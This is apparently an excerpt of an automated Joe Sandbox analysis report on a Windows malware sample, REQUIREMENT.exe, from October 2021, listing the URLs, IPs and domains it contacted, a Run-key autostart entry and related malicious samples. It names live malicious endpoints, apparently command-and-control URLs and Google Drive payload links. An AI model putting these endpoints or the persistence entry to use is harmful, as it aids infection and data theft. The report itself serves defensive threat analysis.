http://www.xn--4pvw92bcry.com/cogu/	true	Avira URL Cloud: safe	unknown
http://www.tpmionline.com/cogu/	true	Avira URL Cloud: safe	unknown
http://www.cinargeridonusum.com/cogu/?E6=YWc9mILWetVQGhipA+G2uDb+SeX0Cd/MjDmv0ZQMTg5SMMvYjLI+xM6WaOuTEiNNd0Xk&GJE=6lTPJF	true	Avira URL Cloud: safe	unknown
http://www.jkwhitleyphotography.com/cogu/?-Z=5j3dv6rhizRPl0MP&E6=0JW80yNTUiIblQnhj6MVn32XupSCHJgGKr7CbJ8acIuUK/cVpV73gH6OM/JKXthPyqu2	true	Avira URL Cloud: safe	unknown
http://www.domainair.biz/cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.cacaolixir.com/cogu/?E6=TP9OdDgalUD062Nc3ik6VEBCj7pU3sm2O2OGxDUNHqL9P8Ry/BX8xz+WUeumcOFdCH3f&EVpdF=D6AlWhC	false	Avira URL Cloud: safe	unknown
https://doc-0o-60-docs.googleusercontent.com/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download	false		high
https://doc-0o-60-docs.googleusercontent.com/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download&nonce=r167qul5841hi&user=04225796272126474013Z&hash=htm37s8j60l12inv0q761u8k5rdo7ceb	false		high
http://www.estudio-me.com/cogu/?E6=L5GjM02Qi9/3ctzLfpX21kbqInICP/PmVfQkFp534KYMBhdy6kz6hr7HyPkdH1b6OtPy&JXeD0V=5jFpKDWXi	true	Avira URL Cloud: safe	unknown
http://www.shopsharpgraphics.com/cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.tpmionline.com/cogu/?E6=Q5540RkvIutfUkv4jGh7NesFHfEn9TtJOrndmKD2I8/SlFrfn/DKKL7940R4DTj3bJkH&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.taichan.xyz/cogu/?E6=A+BqLwYGva59ha/kPE6YS9y5Cw6+WAl2lefwiAx9zEuoRfqY6i5KVFoFLUK0YMYmgzYy&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.centralcontable.net/cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&-Z=5j3dv6rhizRPl0MP	true	Avira URL Cloud: safe	unknown
http://www.boliden-ab.com/cogu/?E6=S26i6wvHPThQg5EmN96E/uV1flc9kx0qaETcxJTPPIRiBsvCj8OwSBVU0bghLZ2zBTNI&-Z=5j3dv6rhizRPl0MP	true	Avira URL Cloud: safe	unknown
http://www.uprisehealthmonitoring.com/cogu/?E6=NFedTnOwyfQnQfz4Fa359HV39V5qjz9UUQouYpwkrhdO9l9uPa/7UwpxNrVjVYhaXz3f&JXeD0V=5jFpKDWXi	true	Avira URL Cloud: safe	unknown
http://www.marvellouslles.com/cogu/?-Z=5j3dv6rhizRPl0MP&E6=jcFOH/ZxkSx2B+eOzji128R7cFyPyE6Tynf2GelbWKAhzBX6sEIR/9TLWk4pwFmf1t+F	true	Avira URL Cloud: safe	unknown
http://www.shopsharpgraphics.com/cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&JXeD0V=5jFpKDWXi	true	Avira URL Cloud: safe	unknown
http://www.researchlearningspirit.xyz/cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&GJE=6lTPJF	true	Avira URL Cloud: safe	unknown
http://www.nu12.online/cogu/?E6=QRnHbABZr1ah6x+kOaYWzzpt/wEyN1uu/6itxi1XZlZPOwHQf3Tea8RViivUAbn0Nq3Q&GJE=6lTPJF	true	Avira URL Cloud: safe	unknown
http://www.xn--4pvw92bcry.com/cogu/?E6=62eHCTnViIbE5q/Vnkbvlz9TsuOUnGzf3IBPc1eKYkVqg+lXJUtXLjRsX48ZiFT924q+&-Z=5j3dv6rhizRPl0MP	true	Avira URL Cloud: safe	unknown
https://docs.google.com/nonceSigner?nonce=r167qul5841hi&continue=https://doc-0o-60-docs.googleusercontent.com/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcjuut1cr6g08d513d6opcs93g9/1634133075000/18281895610876391208/04225796272126474013Z/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e%3Ddownload&hash=ne1ffd4kaaa27pue6e32mldfstfdqasf	false		high
http://www.ceruleden.com/cogu/?-Z=5j3dv6rhizRPl0MP&E6=xvNBpPJxoT3V4STjWu+oXBc4W2+zox4LkJxyAqr5flGYxwgg6ZSnpz45f2Sl431JRkcr	true	Avira URL Cloud: safe	unknown
http://www.hkautobox.com/cogu/?E6=XfIccXNfLX5VXF4pbqJOgkj9hfbfozamY6uAUfQ6uaB911jdIVb8IPx0hpo8MPsnFfll&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.centralcontable.net/cogu/?E6=7eaza+Vm8yYemsyz/zzwjWrklc8Yi5Ho5HX5TNM7allR4urhJrmRG4YV/48q0bSefO77&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.cinargeridonusum.com/cogu/	true	Avira URL Cloud: safe	unknown
www.tpmionline.com/cogu/	true	Avira URL Cloud: safe	low
http://www.cacaolixir.com/cogu/	false	Avira URL Cloud: safe	unknown
http://www.shopsharpgraphics.com/cogu/	true	Avira URL Cloud: safe	unknown
https://doc-04-7g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/21lt93ra59sspsgplogf893q75230rnc/1634132775000/18281895610876391208/*/1cavmvfhBkRkr58kPbP8ymMPJAEJZGE13?e=download	false		high
http://www.nazfoodstuff.com/cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.nu12.online/cogu/	true	Avira URL Cloud: safe	unknown
http://www.soymilk-design.com/cogu/?E6=AKrVC46g6aUqOUl59QNJifV5z+OjBVKueGdcTrEcNhmNt+uKBfQ1nRhJazzsjvYBoCEF&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.bqgfk.com/cogu/?E6=Esy+SZGnlGcFL3b4TdwIqkWYMoe5TN9PO2uJWgi8huQtR8iqs12O2F0FkbqpOK+vLGht&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.domainair.biz/cogu/	true	Avira URL Cloud: safe	unknown
http://www.high-clicks.com/cogu/?E6=kZBNmvv9/eiuWktgT/6kcZDtJw48mlhVfm1ri0sSAffAJ4dIxBHSptGOKbrWsOvy+Lqt&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.researchlearningspirit.xyz/cogu/	true	Avira URL Cloud: safe	unknown
http://www.fishermandm.com/cogu/?E6=Vt5Qt2OmygQqgSlUs1LnTjIm5PAf0+j+U7GfZi7PpDW7/xLcDx4cEzk7U78MhAa3f93Z&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.researchlearningspirit.xyz/cogu/?E6=xC5KNdI4GHSouGT38hjr4jsIQYnK9JeLhI8DzyfFb/cxQtVLaTUcvP9pEn5hYvrjmrvn&EVpdF=D6AlWhC	true	Avira URL Cloud: safe	unknown
http://www.fishermandm.com/cogu/	true	Avira URL Cloud: safe	unknown
http://www.xn--4pvw92bcry.com/cogu/?E6=62eHCTnViIbE5q/Vnkbvlz9TsuOUnGzf3IBPc1eKYkVqg+lXJUtXLjRsX48ZiFT924q+&GJE=6lTPJF	true	Avira URL Cloud: safe	unknown
http://www.nazfoodstuff.com/cogu/	true	Avira URL Cloud: safe	unknown
http://www.alo360.net/cogu/?E6=ryReQ6gKjI02p+tUx8m+7gLTns0HXWXot/Pd7vxfolZ67qcT6NKb85r0SsRZkPEm7LMW&GJE=6lTPJF	true	Avira URL Cloud: safe	unknown
http://www.alexanderorlandis.com/cogu/?E6=6yxwGmrm3Ap/M+4TPZhn44EC1HJh+94HIixwD1LsvJrE4PEEHQNTPR5lSm/JOI/dScyn&JXeD0V=5jFpKDWXi	true	Avira URL Cloud: safe	unknown
http://www.bestofnapa.guide/cogu/?E6=0YOc4eMaPzOzEkITDzffiHUHUfLmwWJQOjcrghoXxwbMleRPqH/xhR7l6RpoJjhKUSQ4&EVpdF=D6AlWhC	false	Avira URL Cloud: safe	unknown
http://www.jachaljuega.com/cogu/?-Z=5j3dv6rhizRPl0MP&E6=nujE8SKobpMEhFJCVnGir4WeRJmwvtVIfZaGtibw0wWMPhuUS2YahDL2LgFihEH5PyEZ	false	Avira URL Cloud: safe	unknown
http://www.i8news-de.website/cogu/?E6=CWSu9rBRqjtTkxrJy4pABq4mxihAfalcaoFBMiLqB2EmPhnp5uCs+6CRD45lGLAfaluR&JXeD0V=5jFpKDWXi	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://docs.google.com/com_q	certmgr3ff.exe, 0000001A.00000003.35635159468.00000000008BC000.00000004.00000001.sdmp	false		high
http://www.thousandoaks-buickgmc.com/cogu/L	systray.exe, 0000000D.00000002.37529684580.0000000002A48000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000009.00000000.32912002579.0000000003840000.00000004.00000001.sdmp, explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	false		high
https://www.zoho.com/sites/images/professionally-crafted-themes.png	systray.exe, 0000000D.00000002.37539878278.0000000005032000.00000004.00020000.sdmp, firefox.exe, 00000015.00000000.35190654399.0000000027692000.00000004.00020000.sdmp	false		high
https://docs.google.com/k	certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp	false		high
http://www.thousandoaks-buickgmc.com/cogu/W	systray.exe, 0000000D.00000002.37529684580.0000000002A48000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000009.00000000.32986465259.000000000DC4B000.00000004.00000001.sdmp	false		high
https://doc-0o-60-docs.googleusercontent.com/docs/secure	certmgr3ff.exe, 0000001A.00000003.35628787904.00000000008B5000.00000004.00000001.sdmp	false		high
https://docs.google.com/	certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp	false		high
https://doc-04-7g-docs.googleusercontent.com/	REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp	false		high
https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant	explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	false		high
https://drive.google.com/	REQUIREMENT.exe, 00000003.00000002.33046720303.0000000000938000.00000004.00000020.sdmp, certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35778362791.00000000008A2000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000003.35811384316.0000000000830000.00000004.00000001.sdmp	false		high
https://doc-04-7g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/21lt93ra	REQUIREMENT.exe, 00000003.00000003.32850629558.00000000009AD000.00000004.00000001.sdmp	false		high
https://docs.google.com/osoft	certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp	false		high
http://www.searchvity.com/?dn=	firefox.exe, 00000015.00000000.35190654399.0000000027692000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thousandoaks-buickgmc.com/cogu/6	systray.exe, 0000000D.00000002.37529684580.0000000002A48000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.comcaS	explorer.exe, 00000009.00000000.32986465259.000000000DC4B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg	explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	false		high
https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin	explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	false		high
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentSignerHttp/external	certmgr3ff.exe, 0000001A.00000003.35641309479.00000000008A9000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000003.35635159468.00000000008BC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/	explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	false		high
https://outlook.com	explorer.exe, 00000009.00000000.32986465259.000000000DC4B000.00000004.00000001.sdmp	false		high
https://doc-04-7g-docs.googleusercontent.com/3	REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp	false		high
https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o	explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	false		high
https://www.msn.com/?ocid=iehp	explorer.exe, 00000009.00000000.32942173512.00000000112AB000.00000004.00000001.sdmp	false		high
https://doc-04-7g-docs.googleusercontent.com/%%doc-04-7g-docs.googleusercontent.com	REQUIREMENT.exe, 00000003.00000002.33046720303.0000000000938000.00000004.00000020.sdmp	false		high
http://www.thousandoaks-buickgmc.com/cogu/	systray.exe, 0000000D.00000002.37539627318.0000000004FB1000.00000004.00020000.sdmp, systray.exe, 0000000D.00000002.37529684580.0000000002A48000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-0o-60-docs.googleusercontent.com/%%doc-0o-60-docs.googleusercontent.com	certmgr3ff.exe, 0000001C.00000002.35818481696.00000000007D8000.00000004.00000020.sdmp	false		high
http://www.searchvity.com/	firefox.exe, 00000015.00000000.35190654399.0000000027692000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb	systray.exe, 0000000D.00000002.37539878278.0000000005032000.00000004.00020000.sdmp, firefox.exe, 00000015.00000000.35190654399.0000000027692000.00000004.00020000.sdmp	false		high
https://doc-0o-60-docs.googleusercontent.com/	certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001B.00000003.35770188314.00000000008F4000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35818787239.0000000000818000.00000004.00000020.sdmp	false		high
https://doc-04-7g-docs.googleusercontent.com/W	REQUIREMENT.exe, 00000003.00000003.32857517475.0000000000997000.00000004.00000001.sdmp	false		high
https://doc-04-7g-docs.googleusercontent.com/S	REQUIREMENT.exe, 00000003.00000002.33046720303.0000000000938000.00000004.00000020.sdmp	false		high
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000009.00000000.32873311751.0000000009C27000.00000004.00000001.sdmp	false		high
https://doc-0o-60-docs.googleusercontent.com/uT	certmgr3ff.exe, 0000001B.00000003.35770188314.00000000008F4000.00000004.00000001.sdmp	false		high
https://www.zoho.com/sites/?src=parkeddomain&dr=www.nazfoodstuff.com	systray.exe, 0000000D.00000002.37539878278.0000000005032000.00000004.00020000.sdmp, firefox.exe, 00000015.00000000.35190654399.0000000027692000.00000004.00020000.sdmp	false		high
http://www.shopsharpgraphics.com	systray.exe, 0000000D.00000002.37540352224.00000000056AB000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/?ocid=iehpLMEM	explorer.exe, 00000009.00000000.32873010204.0000000009BDF000.00000004.00000001.sdmp	false		high
https://doc-0o-60-docs.googleusercontent.com/b	certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp	false		high
http://schemas.micro	explorer.exe, 00000009.00000000.33236468939.000000000A470000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-04-7g-docs.googleusercontent.com/t	REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp	false		high
https://docs.google.com/Gql	certmgr3ff.exe, 0000001A.00000003.35635159468.00000000008BC000.00000004.00000001.sdmp	false		high
https://aka.ms/odirm	explorer.exe, 00000009.00000000.32873311751.0000000009C27000.00000004.00000001.sdmp	false		high
http://www.google.com/support/accounts/answer/151657?hl=en	certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001A.00000003.35639235210.00000000008BC000.00000004.00000001.sdmp	false		high
https://www.msn.com/de-ch/?ocid=iehp	explorer.exe, 00000009.00000000.32942173512.00000000112AB000.00000004.00000001.sdmp	false		high
https://drive.google.com/cA	REQUIREMENT.exe, 00000003.00000002.33046720303.0000000000938000.00000004.00000020.sdmp	false		high
https://drive.google.com/f	certmgr3ff.exe, 0000001A.00000003.35640974044.000000000086B000.00000004.00000001.sdmp	false		high
https://powerpoint.office.com	explorer.exe, 00000009.00000000.32882465556.000000000D5C5000.00000004.00000001.sdmp	false		high
http://www.foreca.com	explorer.exe, 00000009.00000000.32917166408.0000000005964000.00000004.00000001.sdmp	false		high
https://doc-0o-60-docs.googleusercontent.com/-	certmgr3ff.exe, 0000001B.00000002.35778164393.000000000088A000.00000004.00000020.sdmp, certmgr3ff.exe, 0000001C.00000002.35818787239.0000000000818000.00000004.00000020.sdmp	false		high
https://doc-0o-60-docs.googleusercontent.com/docs/securesc/or48ihsk0vmif5iful3e48tbcinjbv55/peotigcj	certmgr3ff.exe, 0000001B.00000003.35765451123.00000000008F4000.00000004.00000001.sdmp, certmgr3ff.exe, 0000001C.00000003.35811384316.0000000000830000.00000004.00000001.sdmp	false		high
https://docs.google.com/nonceSigner?nonce=r167qul5841hi&continue=https://doc-0o-60-docs.googleuserco	certmgr3ff.exe, 0000001A.00000003.35633000839.00000000008C3000.00000004.00000001.sdmp	false		high
https://drive.google.com/ertificates	certmgr3ff.exe, 0000001B.00000002.35778362791.00000000008A2000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
47.88.32.85	www.ceruleden.com	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
199.101.245.90	www.thousandoaks-buickgmc.com	United States	19366	MNSUS	true
185.73.226.109	www.mobileiranian2.com	unknown	44386	OZON-ASRU	true
156.67.72.176	alexanderorlandis.com	United States	201341	TESONETLT	true
192.64.116.180	www.high-clicks.com	United States	22612	NAMECHEAP-NETUS	true
93.184.220.29	unknown	European Union	15133	EDGECASTUS	false
172.67.139.41	www.researchlearningspirit.xyz	United States	13335	CLOUDFLARENETUS	true
172.217.168.46	drive.google.com	United States	15169	GOOGLEUS	false
75.2.115.196	www.xn--4pvw92bcry.com	United States	16509	AMAZON-02US	true
142.250.185.161	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
103.164.172.49	taichan.xyz	unknown	7575	AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	true
156.239.224.4	www.alo360.net	Seychelles	133201	COMING-ASABCDEGROUPCOMPANYLIMITEDHK	true
142.250.186.179	ghs.googlehosted.com	United States	15169	GOOGLEUS	false
51.77.52.109	hkautobox.com	France	16276	OVHFR	true
204.141.43.204	zhs.zohosites.com	United States	2639	ZOHO-ASUS	false
91.195.240.94	www.nu12.online	Germany	47846	SEDO-ASDE	true
15.197.150.5	a402f69f12f4a8640.awsglobalaccelerator.com	United States	7430	TANDEMUS	true
3.121.211.190	www.i8news-de.website	United States	16509	AMAZON-02US	true
151.101.192.119	www.soymilk-design.com	United States	54113	FASTLYUS	true
154.215.231.81	www.cinargeridonusum.com	Seychelles	134548	DXTL-HKDXTLTseungKwanOServiceHK	true
137.117.17.70	www.uprisehealthmonitoring.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
172.217.168.78	docs.google.com	United States	15169	GOOGLEUS	false
192.0.78.25	estudio-me.com	United States	2635	AUTOMATTICUS	true
198.59.144.16	centralcontable.net	United States	13332	HYPEENT-SJUS	true
66.96.130.148	www.fishermandm.com	United States	29873	BIZLAND-SDUS	true
172.217.168.33	unknown	United States	15169	GOOGLEUS	false
34.102.136.180	bestofnapa.guide	United States	15169	GOOGLEUS	false
198.54.117.210	parkingpage.namecheap.com	United States	22612	NAMECHEAP-NETUS	false
198.54.117.211	unknown	United States	22612	NAMECHEAP-NETUS	true
199.34.228.191	www.shopsharpgraphics.com	United States	27647	WEEBLYUS	true
216.189.108.75	tpmionline.com	United States	6921	ARACHNITECUS	true
154.195.206.5	www.bqgfk.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	1641
Start date:	13.10.2021
Start time:	15:44:39
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 17m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	REQUIREMENT.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@26/3@58/32
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 78% Number of executed functions: 215 Number of non-executed functions: 56
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, consent.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 20.82.207.122, 20.54.122.82, 20.82.210.154, 92.123.195.35, 92.123.195.73, 88.221.79.212, 20.190.159.137, 40.126.31.136, 40.126.31.3, 40.126.31.140, 40.126.31.142, 20.190.159.131, 20.190.159.133, 40.126.31.138, 51.132.42.174, 93.184.221.240, 52.109.8.20 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, wu.azureedge.net, www.tm.a.prd.aadg.trafficmanager.net, wildcard.weather.microsoft.com.edgekey.net, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, geo.clients.config.office.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, wdcp.microsoft.com, eur.clients.config.office.akadns.net, wd-prod-cp.trafficmanager.net, login.msa.msidentity.com, prod.nexusrules.live.com.akadns.net, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com, nexusrules.officeapps.live.com, www.tm.lg.prod.aadmsa.trafficmanager.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:51:01	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run S610FPS8_B7 C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe
15:51:09	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run S610FPS8_B7 C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
192.64.116.180	Ck3QG7gfay.exe	Get hash	malicious	Browse	www.baxcol.com/21m/?w8=GL0D&afX8XbUh=38hwCdojXO7GCqsctEDwOaX4jMWfZrA7t3A1i0Tk+mwjTJDb9Flxx1bzCaqqZUql+Wfl
93.184.220.29	kr.ps1	Get hash	malicious	Browse	/
93.184.220.29	SecuredFolder.htm	Get hash	malicious	Browse	status.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQnt%2BO7KdI35ubyUVwz39VP7XeuiQQU5wH8DBYYyn2yjOyHJ6NvYYE7hDkCEAghIHE0ISqj0Gwb1T5M8Uc%3D

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
parkingpage.namecheap.com	ORD2021100866752371AC.exe	Get hash	malicious	Browse	198.54.117.217
	Scan_34668000.exe	Get hash	malicious	Browse	198.54.117.217
	Angebot Anfrage Maschinensucher YOM.exe	Get hash	malicious	Browse	198.54.117.218
	vk5MXd2Rxm.msi	Get hash	malicious	Browse	198.54.117.217
	orde443123.exe	Get hash	malicious	Browse	198.54.117.216
	DHL Shipment Notification 74683783.exe	Get hash	malicious	Browse	198.54.117.210
	vbc.exe	Get hash	malicious	Browse	198.54.117.218
	KYTransactionServer.exe	Get hash	malicious	Browse	198.54.117.215
	doc_0862413890.exe	Get hash	malicious	Browse	198.54.117.218
	PO08485.xlsx	Get hash	malicious	Browse	198.54.117.212
	vURlUPQLT0.exe	Get hash	malicious	Browse	198.54.117.211
	n0jr7NLyU1.exe	Get hash	malicious	Browse	198.54.117.218
	EFghz5ZtCS.exe	Get hash	malicious	Browse	198.54.117.218
	1cG7fOkPjS.exe	Get hash	malicious	Browse	198.54.117.216
	SOA 2021.exe	Get hash	malicious	Browse	198.54.117.215
	etiyrfIKft.exe	Get hash	malicious	Browse	198.54.117.217
	115-209.doc	Get hash	malicious	Browse	198.54.117.210
	s0JV4f4mDk.exe	Get hash	malicious	Browse	198.54.117.210
	obizx.exe	Get hash	malicious	Browse	198.54.117.212
	2765dQIJdE.exe	Get hash	malicious	Browse	198.54.117.210

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MNSUS	Du7uHwvCQC	Get hash	malicious	Browse	216.81.40.165
MNSUS	Y7S49aaObc	Get hash	malicious	Browse	216.81.36.8
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	yUcgVSbRpP.exe	Get hash	malicious	Browse	8.212.24.67
	7rA3B9X5j6	Get hash	malicious	Browse	47.75.69.10
	mixsix_20211013-084409.exe	Get hash	malicious	Browse	47.251.44.214
	jBjlZN5oKo	Get hash	malicious	Browse	47.251.246.130
	KOWEGkPk2R.dll	Get hash	malicious	Browse	47.252.78.131
	b3astmode.arm7	Get hash	malicious	Browse	47.52.227.229
	DHL-Waybill.exe	Get hash	malicious	Browse	8.210.47.56
	jew.arm7	Get hash	malicious	Browse	47.245.171.11
	itl0QxV3Zd	Get hash	malicious	Browse	8.208.140.209
	DQak2G9Ly5	Get hash	malicious	Browse	47.250.33.117
	pWwSAZi4z7.dll	Get hash	malicious	Browse	47.252.78.131
	XaTgTJhfol.exe	Get hash	malicious	Browse	8.210.85.68
	BU23NZriRR.apk	Get hash	malicious	Browse	8.209.97.194
	orde443123.exe	Get hash	malicious	Browse	47.88.84.51
	Sauermann New Order.exe	Get hash	malicious	Browse	8.210.47.56
	vbc.exe	Get hash	malicious	Browse	47.243.170.138
	z0x3n.x86	Get hash	malicious	Browse	8.213.113.54
	TransportLabel_1189160070.xlsx	Get hash	malicious	Browse	8.212.24.67
	Quote -0071021.exe	Get hash	malicious	Browse	8.212.24.67
	DeqrIfxzHW.exe	Get hash	malicious	Browse	47.243.170.138

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	Statement of Account.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
	HUD-Closing-Statement.html	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
	zrArDsoum0.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
	Fra FAC-ES101-2107-03806.doc.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
	correction HAWB.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
	UZWdHg3hWA.exe	Get hash	malicious	Browse	172.217.168.46 172.217.168.78 142.250.185.161 172.217.168.33
